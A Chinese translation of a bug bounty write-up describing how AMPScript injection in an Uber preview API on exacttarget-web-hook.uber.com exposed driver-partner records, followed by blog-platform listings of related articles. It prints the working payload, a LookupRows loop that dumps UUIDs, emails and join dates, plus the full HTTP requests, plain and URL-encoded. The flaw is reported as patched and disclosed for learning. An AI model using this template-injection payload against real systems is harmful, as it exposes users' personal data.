通过AMPScript 来收集Uber的用户数据

最新推荐文章于 2020-12-21 09:33:35 发布
最新推荐文章于 2020-12-21 09:33:35 发布
阅读量2.9w 收藏
点赞数 1
分类专栏: 外文翻译

翻译自:http://blog.assetnote.io/bug-bounty/2019/01/14/gaining-access-to-ubers-user-data-through-ampscript-evaluation/?tdsourcetag=s_pcqq_aiomsg
翻译:聂心明

现代社会和基础建设管理实践都在快节奏,不断的发展着。在快速的发展和扩张中,在快速的发展和拓张之中,新的财富大陆被发现,之后就会在全球市场中快速传播开来。而已存在的经济领域则依然保持着快速的发展。

想要跟上攻击面的发展,这件事简直太困难了。单单从应用和系统的角度来看安全。传统的时间点和静态的安全方法根本无法跟得上这样的变化。在动态的环境中主动的发现威胁也似乎是一件不可能的任务。

仅仅有一种方式去处理这样的问题,这就是将安全评估的方法转换为可持续性的资产意识。当我们通过Assetnote’s Continuous安全平台 的发现大量的攻击面时,我们常常发现基础设施的改变会导致大量新的和未被发现的漏洞。

在这个例子中,我们通过Assetnote’s Continuous安全平台发现了Uber的一个子域名,这个子域名被隐藏的很深:exacttarget-web-hook.uber.com.

很长的一段时间,这个子域名都会返回令人感到厌烦的“Not Found”这个错误,这个页面是由Express.js生成的。

可是,突然有一天,这个子域名成为了Uber用来测试个性化消息系统的服务器。

第一眼看上去,这个应用就像一个为了测试用户个性化消息的api控制台一样。我们尝试用这个控制台提供的“Test Contact Key”,但是发现这个api不能正常工作。经过一些尝试之后,我发现,contactKey这个参数需要一个已经过身份验证的UUID,而不是页面上提供的UUID。我登录uber后,从 https://riders.uber.com/profile 网页源代码中拿到了账户的UUID。

把我们Uber账户中的UUID放入contactKey这个参数中,然后我们给那个preview这个api发送请求。

GET /preview?contactKey=[redacted]&dataExtension=driver_partners&create_new=true&message=&business_unit= HTTP/1.1
Host: exacttarget-web-hook.uber.com
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
Accept: */*
DNT: 1
Referer: https://exacttarget-web-hook.uber.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8

在这篇博客前面的截图我就展示了给preview端发送消息的例子

%%[
SET @firstName = LOOKUP('driver_partners', 'firstname', 'partner_uuid', partner_uuid)
]%%
Hi there I'm %%=v(@firstName)=%% and I created this tool.

从语法上和子域名的名称exacttarget-web-hook来看,我意识到上面的代码其实是AMPScript

Salesforce的云市场上提供AMPScript这种脚本语言,这种语言可以被嵌入到HTML邮件中,文本邮件中,加载页中和sms消息中,目的是给不同的用户展示不同的内容。AMPScript使用ExactTarget开发的,在2013年被Salesforce收购。

在api控制台上使用AMPScript的示例脚本总是失败,所以我们就开始调查是否真的能够执行AMPScript脚本。我们很快的发现可以利用HTTPGet这个函数来发送一段请求,并且可以返回数据报文的内容。

太好了,我们能够直接执行AMPScript。可是,从上面的截图可以看出,执行HTTPGet这个函数的服务器不是Uber的服务器,而是AS22606 ExactTarget, Inc这个服务器。

为了演示这个漏洞的影响。我们从data extension 中的driver_partners中提取用户的用户数据。data extension 是一种数据库的表,可以通过AMPScript’s Data Extension functions来访问到其中的数据。

通过查询AMPScript关于 LookupRows这个函数的描述,我们能够构造一段AMPScript脚本去做下列的事情:

  1. 在data extension中搜索firstname为Shubs的所有数据
  2. 在数组中存储这些数据
  3. 遍历数据把数据打印出来

下面是最终利用的脚本:

%%[
SET @prefArray = LookupRows('driver_partners', 'firstname', 'Shubs')
SET @rCount = RowCount(@prefArray)
FOR @i = 1 TO @rCount DO
	SET @Row = Row(@prefArray, @i)
	SET @ID = Field(@Row, 1)
	SET @UUID = Field(@Row, 2)
	SET @joinDate = Field(@Row, 3)
	SET @email = Field(@Row, 4)
	SET @firstName = Field(@Row, 5)
]%%
	%%=V(@UUID)=%%
	%%=V(@joinDate)=%%
	%%=V(@email)=%%
	%%=V(@firstName)=%%
%%[
NEXT @i
]%%

当我把上面这个脚本发送给preview这个api后,服务器返回了所有名字为Shubs的UUID,注册时间,邮箱地址和名字

下面是发给preview这个api的请求数据:

GET /preview?contactKey=[redacted]&dataExtension=driver_partners&create_new=true&message=%25%25%5b%0d%0a%53%45%54%20%40%70%72%65%66%41%72%72%61%79%20%3d%20%4c%6f%6f%6b%75%70%52%6f%77%73%28%27%64%72%69%76%65%72%5f%70%61%72%74%6e%65%72%73%27%2c%20%27%66%69%72%73%74%6e%61%6d%65%27%2c%20%27%53%68%75%62%73%27%29%0d%0a%53%45%54%20%40%72%43%6f%75%6e%74%20%3d%20%52%6f%77%43%6f%75%6e%74%28%40%70%72%65%66%41%72%72%61%79%29%0d%0a%46%4f%52%20%40%69%20%3d%20%31%20%54%4f%20%40%72%43%6f%75%6e%74%20%44%4f%0d%0a%09%53%45%54%20%40%52%6f%77%20%3d%20%52%6f%77%28%40%70%72%65%66%41%72%72%61%79%2c%20%40%69%29%0d%0a%09%53%45%54%20%40%49%44%20%3d%20%46%69%65%6c%64%28%40%52%6f%77%2c%20%31%29%0d%0a%09%53%45%54%20%40%55%55%49%44%20%3d%20%46%69%65%6c%64%28%40%52%6f%77%2c%20%32%29%0d%0a%09%53%45%54%20%40%6a%6f%69%6e%44%61%74%65%20%3d%20%46%69%65%6c%64%28%40%52%6f%77%2c%20%33%29%0d%0a%09%53%45%54%20%40%65%6d%61%69%6c%20%3d%20%46%69%65%6c%64%28%40%52%6f%77%2c%20%34%29%0d%0a%09%53%45%54%20%40%66%69%72%73%74%4e%61%6d%65%20%3d%20%46%69%65%6c%64%28%40%52%6f%77%2c%20%35%29%0d%0a%09%53%45%54%20%40%75%6e%6b%6e%6f%77%6e%31%30%20%3d%20%46%69%65%6c%64%28%40%52%6f%77%2c%20%31%30%29%0d%0a%5d%25%25%0d%0a%09%25%25%3d%56%28%40%55%55%49%44%29%3d%25%25%0d%0a%09%25%25%3d%56%28%40%6a%6f%69%6e%44%61%74%65%29%3d%25%25%0d%0a%09%25%25%3d%56%28%40%65%6d%61%69%6c%29%3d%25%25%0d%0a%09%25%25%3d%56%28%40%66%69%72%73%74%4e%61%6d%65%29%3d%25%25%0d%0a%09%25%25%3d%56%28%40%75%6e%6b%6e%6f%77%6e%31%30%29%3d%25%25%0d%0a%25%25%5b%0d%0a%4e%45%58%54%20%40%69%0d%0a%5d%25%25&business_unit= HTTP/1.1
Host: exacttarget-web-hook.uber.com
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
Accept: */*
DNT: 1
Referer: https://exacttarget-web-hook.uber.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8

返回报文(UUID和邮箱地址已经被打码)

通过上面的截图,我们可以看到许多名字为Shubs的用户信息已经被返回(上面的截图已经被打码了,只像大家展示测试数据)。攻击者可以在消息中构造特殊AMPScript脚本去获取数据或者在 Uber中通过搜索名字的方式去查询指定人的UUID和邮箱地址。

我在2017年12月13日发现了这个漏洞,厂商在12月15日就修复了这个问题,并且在12月28日给我支付了赏金。

作为由HackerOne举办的Hack the World活动的一部分,我在活动期间获得了“最有影响力的漏洞”,并且获得了$20,000的奖赏。最终这个漏洞给我的奖金为:$23,000。
感谢Uber 和HackerOne。在这个漏洞上和Uber进行合作是一次非常愉快的经历。

如果你的公司或者组织对于Assetnote’s Continuous安全平台非常感兴趣的话,欢迎通过下面链接来联系我们
https://assetnote.io/#signup

niexinming
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
通过AMPScript评估访问Uber用户数据
知柯信安
01-04 233
现代发展和基础设施管理实践快速发展并不断发展。在创新和扩展的竞争中,正在部署新资产并将其快速暴露于公共Internet中,并且现有资产也在不断发展。 与这种不断发展的攻击面保持同步非常困难,更不用说保护那些应用程序和系统了。传统的时间点和静态安全方法根本无法跟上,在这种动态环境中主动管理威胁似乎是不可能完成的任务。 解决此问题的唯一方法是将方法转向安全评估,使其连续且具有资产意识。当使用我们的Continuous Security Platform监视大型攻击面时,我们经常发现对基础结构的更改会导致新的或未
Marketing Cloud AMPScript使用多条件查询数据
Jeffong的博客
02-14 540
AMPScript有一个方法:LookupRows(1, 2, 3) 用来从DE中查询数据的,1是DE名,2是条件字段名,3是条件字段值 如果需要两个条件才能确定一条数据的话,就直接写成LookupRows(1, 2, 3, 4, 5) 4和2一样,是第二个条件字段名,5和3一样,是第二个条件字段值。 3个条件就继续往后加即可。 ...
Marketing Cloud AMPScript UpsertDE和UpsertData的区别
Jeffong的博客
05-08 527
这两个方法都是更新(插入)数据到DE中,但两个方法的使用场景不一样,UpsertDE在Email Message中使用,并且只有当邮件发送了,才会执行,预览的时候不会执行。 UpsertDE https://developer.salesforce.com/docs/atlas.en-us.noversion.mc-programmatic-content.meta/mc-programmat...
Uber开源Marmaray:基于Hadoop的通用数据摄取和分散框架
02-24
三年前,Uber采用ApacheHadoop作为数据平台,从而可以跨计算机集群管理数PB的数据。但是,因为我们有很多团队、工具和数据源,所以需要一种可靠的方式来摄取和分散数据。Marmaray是Uber开源的ApacheHadoop数据提取和分散框架。Marmaray由我们的Hadoop平台团队设计和开发,是一个建立在Hadoop生态系统之上的基于插件的框架。用户可以新增插件以便从任何来源摄取数据,并利用ApacheSpark将数据分散到接收器上。Marmaray这个名字源于土耳其的一条连接欧洲和亚洲的隧道,在Uber内部,我们将Marmaray设想为根据客户偏好将数据从任何来源连接到任何接收
利用AMPScript获取Uber用户数据的访问权限
nuaa_llf的博客
01-23 534
原文链接:https://blog.assetnote.io/bug-bounty/2019/01/14/gaining-access-to-ubers-user-data-through-ampscript-evaluation/ 现代项目开发和资产管理方法正在不停地快速变化。在这场创新和扩张的竞赛中,新资产被迅速部署并暴露于公共互联网,已有资产也在不断发展。 要跟上这个不断变化的攻击面是很难...
Uber 纽约市乘车数据数据
07-02
通过对不同租车公司服务次数、覆盖区域等数据的统计,我们可以评估各公司的市场占有率,揭示Uber在纽约市场的地位及其与竞争对手的关系。此外,还可以通过分析不同公司的接单效率和服务质量,探讨共享经济模式下的...
Uber数据分析:使用Python的Uber数据分析(Panda和Seaborn)
02-21
关于UBER来自旅行者的乘车呼叫数据数据分析,我使用简单的Python(熊猫和seaborn)函数从数据中获得了真正有用的见解。 分析数据后,我们得到以下输出结果: 生成数据所属位置的地图; 生成用户在一周内请求乘车...
Uber Traffic Data Visualization 优步交通数据可视化-数据
03-15
数据为我们提供了有关在各种情况下流量如何从源流向目的地的一些信息。...Uber Movement提供了超过20亿次旅行的匿名数据,以帮助世界范围内的城市规划。 Final_Majestic_to_AIM_jan-2016tomarch-2018.xlsx
使用Python进行Uber数据分析
02-17
该项目旨在揭示所有有趣的见解,这些... 此外,它将通过计划不同的战略来帮助扩展Uber的业务。 在对如此大的数据集以及错误的输入进行适当的分析和可视化之后,我们能够显示许多图形,这些图形指向一些非常重要的结果。
Assetnote提供的自动和手动单词表-JavaScript开发
05-26
对资产执行安全性测试时,拥有用于内容和子域发现的高质量单词列表至关重要。 Assetnote词表对资产执行安全性测试时,拥有用于内容和子域发现的高质量词表至关重要。 该网站为您提供了最新的单词列表,并且可以有效地抵抗互联网上最流行的技术。 使用Commonspeak2和GitHub Actions在每个月的28号生成单词列表。 如果您想要一个扩展名或技术来使用单词表,但此存储库中未包含该扩展名或技术,请​​向我们发送PR并将其
Atom-atom-language-ampscript,用于atom的ampscript语言包。对diemogebhardt/atom的贡献.zip
09-18
Atom-atom-language-ampscript.zip,用于atom的ampscript语言包atom中的ampscript语言支持,atom是一个用web技术构建的开源文本编辑器。
wordlists:Assetnote提供的自动和手动单词表
03-18
在查看并下载所有单词表 对资产执行安全性测试时,拥有用于内容和子域发现的高质量单词列表至关重要。该网站为您提供了最新的单词列表,并且可以有效地抵抗互联网上最流行的技术。 使用和每个月的28号生成。如果您想要一个扩展名或技术来使用单词表,但此仓库中未包含该扩展名或技术,请并在下次运行后将其包含在此页面中。 Assetnote Continuous Security会自动映射您的外部资产并监视它们的更改和安全问题,以帮助防止严重的违规行为。如果您想保护自己的攻击面并想演示我们的产品,请。 下载所有单词表 您可以使用以下命令下载此项目生成的所有单词表: aws s3 sync s3://assetnote-wordlists/data/ ./assetnote-wordlists --no-sign-request 此回购如何运作 在每个月的28号,GitHub动作用于使用Commonspe
Salesforce_Marketing_Cloud_Code:Salesforce Marketing Cloud代码存储库
02-14
Salesforce Marketing Cloud AMPScript,JavaScript,FUEL SDK-NODE,SQL食谱和示例 此存储库包含用于客户Salesforce Marketing Cloud参与的各种配方/示例。 AMPscript简介 AMPscript是一种脚本语言,您可以将其嵌入HTML电子邮件,文本电子邮件,登录页面,SMS消息和来自MobilePush的推送通知中。 系统会在将脚本包含在消息中的那一刻对脚本进行处理,以逐个订户的方式呈现内容。 Marketing Cloud应用程序在电子邮件发送结束时处理所有AMPscript调用。 AMPscript还可以与您的数据扩展名进行交互。 使用AMPscript在邮件中包含数据扩展名中的信息,并使用登录页面中的信息更新数据扩展名。 使用AMPscript来处理信息,并将来自数据扩展的信息包括在邮件和登录页
babel:一个Python脚本,用于自动执行AMPscript中的翻译字符串
05-28
巴别塔 一个简单的脚本,用于自动执行AMPscript中的变量分配,专门针对Excel电子表格中的翻译字符串而制作 依赖项: 安装: 要安装XLRD,请运行以下命令: python setup.py install 用法 要运行Babel转换器,请运行以下命令: python babel.py example ,其中“ example”是“ example.xlsx”的简写形式,“ example.xlsx”是翻译所基于的电子表格的名称。 您应该了解几件事: 有一个包含所需布局的示例电子表格,称为“ example.xlsx”。 左列将确定ampscript变量名称。 为避免语法问题,切勿使用空格。 例如,尝试使用诸如secondParagraphText之类的方法代替“第二段正文”。 您不需要包含@符号。 Babel始终设置行为完全与第一种情况完全相同的ELSE语句。
Uber数据可视化实践
睡前人工智能共享实验室
12-21 486
在全球 1 万多个城市,每天都有数百万人依靠 Uber 出行、订餐和运送货物。我们的应用在超过 69 个国家和地区提供 24 小时的服务。从全球范围来看,这些活动生成了大量的日志记录和操作数据,这些数据可以在我们的系统中实时运行。其中包括有关消费者需求、司机伙伴可用性以及其他运营任务(如支付、通知等)的信息。运营像我们这样复杂的市场,需要工程师、数据科学家、数据分析师和运营经理根据平台上观察到的趋势作出实时业务决策。 为了帮助团队轻松发现并更好地理解这些数据,我们构建了 Databook。这是 ...
Uber市场部门日志实时处理-解读
weixin_34319999的博客
08-17 158
Kafka 2016 Summit上Uber工程师Danny Yuan分享了一个Streaming Processing PPT,如何解决Uber里Operation Team所需要的需求。看了整个视频觉得介绍很细致,这对于大部分LBS (Location Based Service)有很好的借鉴意义。 业务需求 Realtime OLAP 对于Oper...
【大数据Uber数据架构
weixin_34290631的博客
08-20 319
三月份小编在美国参加MVP峰会的时候,有幸碰到了几个Uber的高级工程师,他们在当天还分享了Uber的消息总线系统如何在每日兆级信息量、PB级数据卷、数万个Topic的情况下,保证低延时(小于5ms),高可用(99.99%),高稳定(99.99%,核心客户100%)的。 有朋友对Uber这种打车软件公司能达到这样的数据量感到不以为然,认为只有社交类(如F...
AMP技术详解
weixin_33895604的博客
08-01 2665
AMP是什么 Google 前沿的 AMP 「 Accelerated Mobile Pages 」技术,能使用户从搜索引擎当中进入我们页面的体验得到一个极大的提升。 AMP组成 AMP HTML AMP HTML 本质上是使用自定义 AMP 属性扩展的 HTML。最简单的 AMP HTML 文件如下所示: <!doctype html> <html ⚡> <hea...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值